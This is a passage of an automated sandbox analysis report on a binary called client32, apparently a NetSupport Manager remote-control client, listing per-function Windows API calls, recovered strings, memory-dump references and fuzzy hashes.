                                                          • Part of subcall function 110091F0: std::_Xinvalid_argument.LIBCPMT ref: 11009265
                                                          • Part of subcall function 110091F0: _memmove.LIBCMT ref: 110092B6
                                                        Strings
                                                        • Your system/device requires approval by the service before you can access it fully, xrefs: 110D36D7
                                                        • Invalid Passcode, xrefs: 110D3695
                                                        • The version of the software you are running is not supported by the service, xrefs: 110D36B6
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Exception@8ThrowXinvalid_argument_malloc_memmove_memsetstd::_std::exception::exceptionwsprintf
                                                        • String ID: Invalid Passcode$The version of the software you are running is not supported by the service$Your system/device requires approval by the service before you can access it fully
                                                        • API String ID: 390219819-299493402
                                                        • Opcode ID: 767883e3574baf54fe023af10dad3d7da6e7b29b5df840732df2b4cd092bae1b
                                                        • Instruction ID: 290987c637faf9a82613e3c1efdfb8245697807f6b36602a3304b8d6bb74055a
                                                        • Opcode Fuzzy Hash: 767883e3574baf54fe023af10dad3d7da6e7b29b5df840732df2b4cd092bae1b
                                                        • Instruction Fuzzy Hash: FC4162B5A0420AABD700CF99C850BDAF7F8FF08314F00865AE91997781DB74AA04CBA0
                                                        Function 11049150 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • KillTimer.USER32(00000000,00000001), ref: 1104919C
                                                          • Part of subcall function 11035830: wsprintfA.USER32 ref: 1103589E
                                                          • Part of subcall function 11035830: SetDlgItemTextA.USER32(?,?,?), ref: 1103596F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ItemKillTextTimerwsprintf
                                                        • String ID: AckDlgTimeoutAccept$Client$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 1646146092-2249245707
                                                        • Opcode ID: 74a23c6806cd996f4e5802ec0325577df80bd7c351eda1b89e39841f079f60ff
                                                        • Instruction ID: c02fd1ebd72f3abd6975baaa61c1d6d589ae8a261551f4e8277244e37f20d25c
                                                        • Opcode Fuzzy Hash: 74a23c6806cd996f4e5802ec0325577df80bd7c351eda1b89e39841f079f60ff
                                                        • Instruction Fuzzy Hash: 8511B479B0070A6BE710DE65DC84F9AB3D9AB88354F108439FA5597690EB71F801CBA1
                                                        Function 110AF190 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowTextA.USER32(00000000,?), ref: 110AF24F
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorExitLastMessageProcessTextWindowwsprintf
                                                        • String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 2794799252-3129562787
                                                        • Opcode ID: 2da599f0c3f2941dd33979318759614f42c18a09b34261b493e4f111dfc93822
                                                        • Instruction ID: 30af45ef0dcef238f528407b1a4bc814dd764d345def6d437735f0addba69835
                                                        • Opcode Fuzzy Hash: 2da599f0c3f2941dd33979318759614f42c18a09b34261b493e4f111dfc93822
                                                        • Instruction Fuzzy Hash: 39113A7DB007126BD922DA55FC00F8FF399AF9966DF004468E90567784EB35BA10CAA3
                                                        Function 110C5700 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __strdup.LIBCMT ref: 110C5737
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorExitLastMessageProcess__strdupwsprintf
                                                        • String ID: *this==src$..\CTL32\NSMString.cpp$IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                        • API String ID: 3256405202-349135390
                                                        • Opcode ID: 1238c60e75543991bc3227262facd9733687b896ae40ff399294cd2a1af6fe5d
                                                        • Instruction ID: 990c6adcda38b5987a728539be4123f148fa86f5ba4ad2cdd8a82a2db87de86a
                                                        • Opcode Fuzzy Hash: 1238c60e75543991bc3227262facd9733687b896ae40ff399294cd2a1af6fe5d
                                                        • Instruction Fuzzy Hash: 431102BCF00A03ABC611DF19EC04F9AF3AAAF95A48700C0A5E96497711EB22B4048F91
                                                        Function 111032D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57threadwindowsynchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 111032E8
                                                          • Part of subcall function 11102790: SetEvent.KERNEL32(00000000), ref: 111027B4
                                                        • WaitForSingleObject.KERNEL32(00000264,000003E8), ref: 1110331C
                                                          • Part of subcall function 11103100: EnterCriticalSection.KERNEL32(00000010,00000000,771B23A0,1100BE4B), ref: 11103108
                                                          • Part of subcall function 11103100: LeaveCriticalSection.KERNEL32(00000010), ref: 11103115
                                                        • PostMessageA.USER32(?,00000501,00000000,00000000), ref: 11103344
                                                        • PostThreadMessageA.USER32(?,00000501,00000000,00000000), ref: 1110334B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalMessagePostSectionThread$CurrentEnterEventLeaveObjectSingleWait
                                                        • String ID: Queue
                                                        • API String ID: 620033763-3191623783
                                                        • Opcode ID: 5ed127e90d7aea9cc1c571c6faff837e9d0f0bb831e3de670e3d281e69687fa7
                                                        • Instruction ID: d8bb1088ac88664d3c3efc55309011d502dc20e6f167e529d16559b1f6741692
                                                        • Opcode Fuzzy Hash: 5ed127e90d7aea9cc1c571c6faff837e9d0f0bb831e3de670e3d281e69687fa7
                                                        • Instruction Fuzzy Hash: B311A039A557219FDB119B64D8C4B0BF7A4AB4A75CF008939E9518B380DE70F800CBA1
                                                        Function 110B71D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registrywindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClassInfoA.USER32(00000000,NSMCobrMain,?), ref: 110B71E5
                                                        • LoadIconA.USER32(00000000,000032FA), ref: 110B7209
                                                        • LoadCursorA.USER32(00000000,000019C8), ref: 110B721D
                                                        • RegisterClassA.USER32(?), ref: 110B7250
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ClassLoad$CursorIconInfoRegister
                                                        • String ID: NSMCobrMain
                                                        • API String ID: 2883182437-2967143332
                                                        • Opcode ID: 1454587d98dabe09f0e1e52a1eccee313279903a0eb30fd0b654e57c9fcb1f51
                                                        • Instruction ID: a253c0c09f64e32af6d17fda3169afc3079e396ae35490942e04615450f6f666
                                                        • Opcode Fuzzy Hash: 1454587d98dabe09f0e1e52a1eccee313279903a0eb30fd0b654e57c9fcb1f51
                                                        • Instruction Fuzzy Hash: 6C015AB5D0522D9BCF00DFE8C8496EEBBBDFB08704F40496AF815B3280D77555408BA5
                                                        Function 1107B000 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _malloc.LIBCMT ref: 1107B027
                                                          • Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
                                                          • Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
                                                          • Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateErrorExitHeapLastMessageProcess_mallocwsprintf
                                                        • String ID: ..\CTL32\DataStream.cpp$IsA()$IsEmpty()$e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h
                                                        • API String ID: 1213237569-3592610322
                                                        • Opcode ID: b0d4951e3e1e982a5900b13c958f5742c237ff4dd3663e560167556411a43178
                                                        • Instruction ID: 8f9985f317ad91541f6e001387be189c660fec69166a5be52da1ea2e7750abee
                                                        • Opcode Fuzzy Hash: b0d4951e3e1e982a5900b13c958f5742c237ff4dd3663e560167556411a43178
                                                        • Instruction Fuzzy Hash: F6F090B5A00B155FE3709F55DC04B86F7E8AF14708F008529E5AA97A40E7B1B514CFD1
                                                        Function 110430C0 Relevance: 7.8, APIs: 5, Instructions: 258COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeString$__wcsicoll_memset
                                                        • String ID:
                                                        • API String ID: 3719176846-0
                                                        • Opcode ID: b59fc4aa0084b8af2c0cb7ab9d91f53fdc2d914e01a4c7aac3460fa52ae7c500
                                                        • Instruction ID: a4194a8621443a07a5b91cd7e8cbaf5f1c01176b50590b941be4798e65b70277
                                                        • Opcode Fuzzy Hash: b59fc4aa0084b8af2c0cb7ab9d91f53fdc2d914e01a4c7aac3460fa52ae7c500
                                                        • Instruction Fuzzy Hash: A2A1F775E046299FCB61CF59CC84ADAB7B9AF89305F2085D9E50CAB310DB31AE85CF50
                                                        Function 11107040 Relevance: 7.7, APIs: 5, Instructions: 171COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Caret$ClientCreateDestroyRectShow
                                                        • String ID:
                                                        • API String ID: 3292185885-0
                                                        • Opcode ID: eec5a9e55dd84aaa02b758eb0de184b29d26ab499fca542160f29245d0eece66
                                                        • Instruction ID: 7f8c4dcae8a1f5dcc1e133171a0418012556dc92a04c507beb10c8b842d59a54
                                                        • Opcode Fuzzy Hash: eec5a9e55dd84aaa02b758eb0de184b29d26ab499fca542160f29245d0eece66
                                                        • Instruction Fuzzy Hash: DF519171E00B058BC715CE78C9C57AAF7FAEB88314F25952DE5AAC7280D634F945CB50
                                                        Function 110933C0 Relevance: 7.6, APIs: 5, Instructions: 131COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 11093412
                                                        • SHGetMalloc.SHELL32(?), ref: 11093421
                                                        • SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000C00,00000000,?,?,?), ref: 110934A9
                                                        • CoTaskMemFree.OLE32(?), ref: 11093514
                                                        • CoTaskMemFree.OLE32(?), ref: 11093529
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeTask$FileInfoMalloc_memset
                                                        • String ID:
                                                        • API String ID: 2885524667-0
                                                        • Opcode ID: 89345285ef7d7bab315390cfc6260b6fce797b71e935e12d37aa82ac9be1b202
                                                        • Instruction ID: 28a74fc2d3e6b814f31ef4bd2b52e05c0b9688f5ab77d3eb3e4ee6575e525884
                                                        • Opcode Fuzzy Hash: 89345285ef7d7bab315390cfc6260b6fce797b71e935e12d37aa82ac9be1b202
                                                        • Instruction Fuzzy Hash: 64414B76A082189FDB11CF64CC94BEFB7B9AF49304F5041D9E44D9B240DA71AE85DF90
                                                        Function 11151524 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _malloc.LIBCMT ref: 11151532
                                                          • Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
                                                          • Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
                                                          • Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616
                                                        • _free.LIBCMT ref: 11151545
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap_free_malloc
                                                        • String ID:
                                                        • API String ID: 1020059152-0
                                                        • Opcode ID: b87245d6c8a11ff54dd947b9a3f53e119b3ac4d58a83e5b28fb18c8775291f84
                                                        • Instruction ID: 35b369d0f5c4220ee84277d88253d6fdcb9dc3b21ba59b57d6bf339a69f5eb09
                                                        • Opcode Fuzzy Hash: b87245d6c8a11ff54dd947b9a3f53e119b3ac4d58a83e5b28fb18c8775291f84
                                                        • Instruction Fuzzy Hash: 8B110A37410623ABCBD32F74980465EFB9AAF472BCF594525F83AC7180DF3499418791
                                                        Function 110AB090 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(00000028,?,?,?,11043F5C,?,00000001), ref: 110AB09B
                                                        • LeaveCriticalSection.KERNEL32(00000028,?,?,?,11043F5C,?,00000001), ref: 110AB0BE
